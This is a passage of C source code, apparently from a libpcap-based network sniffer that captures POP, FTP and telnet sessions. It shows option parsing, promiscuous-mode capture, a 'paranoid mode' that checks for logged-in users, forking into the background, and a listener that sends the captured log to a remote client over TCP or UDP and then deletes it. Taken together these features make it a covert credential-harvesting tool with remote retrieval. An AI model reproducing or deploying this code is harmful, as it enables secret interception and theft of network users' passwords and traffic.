                      }
                   }
                   break;
         case 'k': ++kflag;regex=optarg;break;           /* keyword parsing */
         case 'm': ++mflag; max_matches=atoi(optarg);break;  /* max matches */
         case 'n': ++nflag;break;                /* NFS filehandle sniffing */
         case 'p': ++pflag;break;                          /* paranoid mode */
         case 'q': ++quiet;break;                             /* quiet mode */
         case 'r': ++rflag;
                   if (!quiet) {
                      fprintf(stderr,"[%s]: No resolution of IPs\n",argv[0]);
                   }
                   break;                /* Do not resolve IPs to hostnames */
         case 's': datalen=atoi(optarg);break;       /* capture buffer size */
         case 'u': ++uflag;uflag_filter=optarg;break;      /* filter string */
         case 't': ++tflag;break;                       /* no telnet kludge */
         case 'w': newuser=optarg;
                   if (!quiet) {
                      fprintf(stderr,"[%s]: switching to user: %s\n",argv[0],
                              newuser);
                   }
                   break;                /*setuid to username when sniffing */
         case 'v': ++verbose;break;                         /* verbose mode */
         case 'x': ++dont_log_dupes;         /* dont log duplicate POP/FTP  */
                   if (!quiet) {
                      fprintf(stderr,"[%s]: Excluding duplicate POP/FTP connections.\n", argv[0]);
                   }
                   (void) hcreate(HASHTABLE_USERS);
                   break;
         case 'y': ++yflag; udp_srcport=atoi(optarg);break; /* remote logging*/

      }
   }
   if ((!oflag) && (!lflag)) { 
        outfile = stdout;
        if (!quiet) fprintf(stderr,"[%s]: Dumping output to stdout.\n",argv[0]);
   } 

   /*
    * Only allow someone to specify the -l (listen_port) flag
    * if they have specified the -o (output file) flag first.
    * Otherwise, we'd have to cache the logfile in ram.
    */
   if ((!oflag) && (lflag)) {
      fprintf(stderr,"[%s]: ERROR: Can not enter daemon mode without -o flag set.\n",
              argv[0]);
   }

   if (!quiet) {
      fprintf(stderr,"[%s]: Capturing %d bytes per connection.\n",
                       argv[0],datalen); 
      if (fflag) fprintf(stderr,"[%s]: Using PID: %d.\n",argv[0],getpid());
   }

   /*
    * Look up an appropriate network device to listen on.
    */   
   if (device == NULL) {
      device = pcap_lookupdev(errbuf);
      if (device == NULL) {
         fprintf(stderr, "ERROR: %s\n", errbuf);
         exit(1);
      }
   }
   
   /*
    * Open the network device in promiscuous mode for sniffing.
    */
   pcap_device = pcap_open_live(device, SNAPLEN, 1, 1000, errbuf);
   if (pcap_device == NULL) {
      fprintf(stderr, "ERROR: %s\n", errbuf);
      exit(1);
   }

   /*
    * Lookup localnet and netmask.
    */
   if ( pcap_lookupnet(device, &localnet, &netmask, errbuf) < 0 ) {
      fprintf(stderr, "ERROR: %s\n", errbuf);
      exit(1);
   }

   /* 
    * Set up in-kernel packet filtering.  With bpf we can sniff
    *   on VERY BUSY networks and drop fewer packets.
    */
   filter_str = copy_argv(&argv[optind]);
        if (!uflag) {
            filter_str = FILTER_STR;
        } else {
            filter_str = uflag_filter;
        }
   fprintf (stderr,"[%s]: Using filter: %s\n",argv[0],filter_str);
   if ( pcap_compile(pcap_device, &fcode, filter_str, 1, netmask) < 0 ) {
      fprintf(stderr, "ERROR: %s\n", pcap_geterr(pcap_device));
      exit(1);
   }

   if ( pcap_setfilter(pcap_device, &fcode) < 0 ) {
      fprintf(stderr, "ERROR: %s\n", pcap_geterr(pcap_device));
      exit(1);
   }

  /* regex parsing setup is done here */
  if (regex) {
    re_syntax_options = RE_SYNTAX_EGREP;

    if (re_ignore_case) {
      char *s;
      int i;

      s = regex;
      while (*s) {
        if (isalpha(*s))
          *s = tolower(*s);
        s++;
      }

      pattern.translate = (char*)malloc(256);
      s = pattern.translate;
      for (i = 0; i < 256; i++)
        s[i] = i;
      for (i = 'A'; i <= 'Z'; i++)
        s[i] = i + 32;
    }

    if (re_match_word) {
      char *word_regex = malloc(strlen(regex) * 3 + strlen(WORD_REGEX));
      sprintf(word_regex,WORD_REGEX,regex,regex,regex);
      regex = word_regex;
    }

    (const)re_err = re_compile_pattern(regex,strlen(regex),&pattern);
    if (re_err) {
      fprintf(stderr,"regex compile: %s\n",re_err);
      exit(-1);
    }

    pattern.fastmap = (char*)malloc(256);

    if (re_compile_fastmap(&pattern)) {
      perror("fastmap compile failed");
      exit(-1);
    }

    if (!quiet && regex && strlen(regex))
      if (!quiet) printf("[%s]: regex pattern: %s\n",argv[0],regex);
  } /* end regex setup parsing */

#ifdef CRYPT
   /*
    * Initialize DES encryption.
    */
   if (cflag)
      encryption_setup();
#endif
   /*
    * Initialize Paranoid mode
    */
   if (pflag) 
      paranoid_setup();

   /*
    * Record starting time.
    */
   time(&starttime);

   /*
    * Install signal handlers.
    */
   (void) signal(SIGINT,  sig_handler);
   (void) signal(SIGTERM, sig_handler);
   (void) signal(SIGQUIT, sig_handler);
   (void) signal(SIGHUP, sighup_pausesniffing);

   /* 
    * If the -f flag is present, sniff in the foreground.
    * Otherwise, fork a child and use that to sniff.
    */
   if (fflag) {
      if (!quiet)
         fprintf(stderr, "[%s]: Sniffing on device %s.\n", argv[0], device);
   }
   if (!fflag) {
      if ( (pid = fork()) < 0 ) {
         fprintf(stderr, "ERROR: Could not fork().\n");
         exit(1);
      } else if (pid != 0) {
         /* Parent */
         if (!quiet) {
            fprintf(stderr, 
               "[%s]: Background sniffing on device %s [pid %d]\n", 
               argv[0], device, pid);
         }
         _exit(0);
      }
   }

   /*
    * Become session leader.
    */
   setsid();

   /*
    * Reset the signal handler.
    */
   if (signal(SIGALRM, sig_alrm) == SIG_ERR) {
      fprintf(stderr, "ERROR: Catching SIGALRM.\n");
      exit(1);
   }
   alarm(ALARM_SECS);

   /* Sanity check if -y was entered but not -l */
   if ((yflag) && (!lflag)) {
      fprintf(stderr,"[%s]: ERROR: When using -y, you must use -l.\n",argv[0]);
      exit(1);
   }

   /*
    * If the -l flag (listen_port) is set, 
    * accept connections and dump outfile to
    * the socket. Do this only if -o flag is
    * set.
    */ 
   if ((oflag) && (lflag)) {
      if (!quiet) fprintf(stderr,"[%s]: Listening on port %d.\n",
                          argv[0], listen_port);
      if ((yflag) && (!quiet)) {
            fprintf(stderr,"[%s]: Using UDP for connections originating ",argv[0]);
            fprintf(stderr,"source port %d.\n",udp_srcport);
      }
      bind_socket(pid, listen_port);
   }

   /*
    * We're here! Sniff packets and loop continuously.
    */
   
   filter = lookup_filter(pcap_datalink(pcap_device));
   
   if(newuser)
   {
      struct passwd *pw;
      char *p;
      int x=strtol(newuser, &p, 10);
      if(*p!=0 || *newuser==0)
      {
         pw=getpwnam(newuser);
         if(pw) x=pw->pw_uid; else x=0;
      }
      setuid(x);
   }

   while (1) {
      pcap_loop(pcap_device, cnt, filter, pcap_userdata);
   }

   /* NOT REACHED */
   pcap_close(pcap_device);
   exit(0);
}


/*
 * Alarm signal handler.  
 *   (1) Expire idle connections.
 *   (2) Check utmp in paranoid mode.
 */
static void
sig_alrm(int signo)
{
   /*
    * Timeout IDLE nodes.
    */
   IDLE_NODES();

   /*
    * If we are in paranoid mode, check for active users.
    */
   if (pflag)
      paranoid_check();

   /*
    * Reset the signal handler.
    */
   if (signal(SIGALRM, sig_alrm) == SIG_ERR) {
      fprintf(stderr, "ERROR: Catching SIGALRM.\n");
      exit(1);
   }

   alarm(ALARM_SECS);
}


/*
 * Cleanup and exit.
 */
void
cleanup(char *msg)
{
   struct node *endnode;
   
   while ( (endnode = rootnode) )
      END_NODE(endnode, (u_char *) NULL, 0, msg);
   if (!quiet) fprintf(stderr,"[%s]: Caught %s, Exiting.\n",ss_args[0],msg);
   //drop_promisc(device, (int) pcap_device->fd); 
   drop_promisc(device, pcap_fileno(pcap_device)); 
   hdestroy();
   exit(1);
}

 /*
 ** SIGHUP signal handler (pausesniffing)
 **
 ** When we recieve the first SIGHUP, we pause for five minutes.
 ** When we recieve the second SIGHUP, we recreate the outfile and
 ** start sniffing again.  
 **
 ** This is used for safe removal of log files off a system.
 */
static void
sighup_pausesniffing (int signo) {
   fflush(outfile);    /* flush all buffers */
   fclose(outfile);    /* close the outfile file descriptor */

   /*
   ** reassign sighup signal handler so 
   ** that when we get another SIGHUP
   ** we can start sniffing again.
   */
   (void) signal (SIGHUP, sighup_startsniffing); 
   fprintf(stderr,"[%s]: Caught SIGHUP. Sniffing paused.\n",ss_args[0]);
   fprintf(stderr,"Send SIGHUP again to restart sniffing.\n");
   sighup_toggle=1;      /* turn on the toggle switch */  

   while (sighup_toggle != 0) {
      sleep (100000);  /* sleep for a long time until we recieve signal */
   }

   /*
   ** If we reach this point, its either because
   ** the sleep() finished, or because we recieved
   ** another SIGHUP telling us to restart sniffing.
   */
   
   return;
}

static void
sighup_startsniffing (int signo) {

   /*
   ** reassign sighup handler back to normal position and return.
   */
   (void) signal (SIGHUP, sighup_pausesniffing);
   fprintf(stderr,"[%s]: Caught SIGHUP. Sniffing restarted.\n",ss_args[0]);
   if (oflag) {
      outfile = fopen(filename, "w");
      if (!outfile) {
         fprintf(stderr,"Error opening %s, using stdout.\n",filename);
         outfile = stdout;
      }
   } else {
      outfile = stdout;
   }
   sighup_toggle=0;    /* reset the toggle switch */
   return;
}   




/*
 * Signal Handler.
 */
static void
sig_handler(int signo)
{
   char s[16];
   sprintf(s, "SIG %d", signo);
   cleanup(s);
}


int match(struct re_pattern_buffer *pattern, char *data, int len) {
  switch(re_search(pattern,data,len,0,len,0)) {
    case -2:
      perror("re_search");
      exit(-1);
    case -1:
      return 0;
  }

  if (max_matches && ++matches > max_matches)
    sig_handler(0);

  if (match_after && keep_matching != match_after)
    keep_matching = match_after;

  return 1;
}

int bind_socket(pid_t parent_pid, int listen_port) {
  int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, bytes_read;
  struct sockaddr_in serv_addr; struct sockaddr_in client_addr;
  char buf[1024];

  if (yflag) {  /* use udp */
     soc_des = socket(AF_INET, SOCK_DGRAM, 0);
  } else {      /* use tcp */
     soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  }
  if (soc_des == -1) return(0); 
  bzero((char *) &serv_addr, sizeof(serv_addr));
  serv_addr.sin_family = AF_INET; 
  serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
  serv_addr.sin_port = htons(listen_port);
  soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
  if (soc_rc != 0) return(-1); 
  signal(SIGHUP, SIG_IGN); 
  if (!fork()) {  /* inside child process */
   soc_rc = listen(soc_des, 5); 
   if (soc_rc != 0) return(-1); 
   if (yflag) {   /* UDP Server */
    while(1) {
      soc_len = sizeof(client_addr);
      /* NOT SURE WE NEED THIS */
      // if(recvfrom(soc_des,buf,BUFSIZ,0,(struct sockaddr *)&client_addr,&soc_len < 0)
      //    break;
      /* Only accept connections from udp_srcport */
      if(ntohs(client_addr.sin_port) == udp_srcport) { 
        if(connect(soc_des,(struct sockaddr *)&client_addr,sizeof(client_addr)) == -1) {
          fprintf(stderr,"[%s]: error: connect()\n",ss_args[0]);
          exit(1);
        }
        kill (parent_pid, 1); /* send a SIGHUP to the sniffer. Pause Sniffing */
        if ((outfile = fopen(filename, "r")) == NULL) {
          if (!quiet) {
             fprintf(stderr, "[%s]: error opening %s\n", ss_args[0], filename);
          }
          write(soc_des,"Error opening logfile\r\n",23);
          close(soc_des);
          _exit(1);
        } else {
          memset(buf,0,1024);
          while(fgets(buf,1024,outfile)){
             write(soc_des,buf,strlen(buf) );
             memset(buf,0,1024);
          }
          fclose(outfile);
          close(soc_des);
          // unlink(filename);     /* remove outfile */
          kill(parent_pid,1);  /* re-start sniffing */
          _exit(0);
        }
      }
    }
   } else {
    while (1) { 
     soc_len = sizeof(client_addr);
     soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
     if (soc_cli < 0) return(-1); 
       dup2(soc_cli,0);  /* duplicate stdin,stdout,stderr */
       dup2(soc_cli,1); 
       dup2(soc_cli,2);
       /*
       ** someone has connected to the socket. At this point
       ** we need to stop sniffing, dump the log file that
       ** currently exists, and then start sniffing again.
       */
       kill (parent_pid, 1); /* send a SIGHUP to the sniffer. Pause Sniffing */
       if ((outfile = fopen(filename, "r")) == NULL) {
          if (!quiet) {
             fprintf(stderr, "[%s]: error opening %s\n", ss_args[0], filename);
          }
          write(soc_cli,"Error opening logfile\r\n",23);
          close(soc_cli);
          _exit(1);
       } else {
          memset(buf,0,1024);
          while(fgets(buf,1024,outfile)){
             write(soc_cli,buf,strlen(buf) );
             memset(buf,0,1024);
          }
          fclose(outfile);
          close(soc_cli);
          unlink(filename);     /* remove outfile */
          kill(parent_pid,1);  /* re-start sniffing */
          _exit(0); 
       }
 
       return(0);
     close(soc_cli);
    }
   }
  } else { 
   return(-1); 
  }
  return 0;
}


int drop_promisc(char *dev, int pcap_fd)
{
    struct ifreq ifr;
   
    strcpy(ifr.ifr_name, dev);

    fprintf(stderr, "[%s]: Dropping promisc from interface %s\n", ss_args[0],dev);
    
    if(ioctl(pcap_fd, SIOCGIFFLAGS, &ifr) < 0)
    {
    close(pcap_fd);
    perror("Can't drop promisc bit! Bailing");
    exit(0);
    }
    ifr.ifr_flags &= ~IFF_PROMISC;
    if(ioctl(pcap_fd, SIOCSIFFLAGS, &ifr) < 0)
    {
    perror("Can't drop promisc bit");
    return(0);
    }	
}
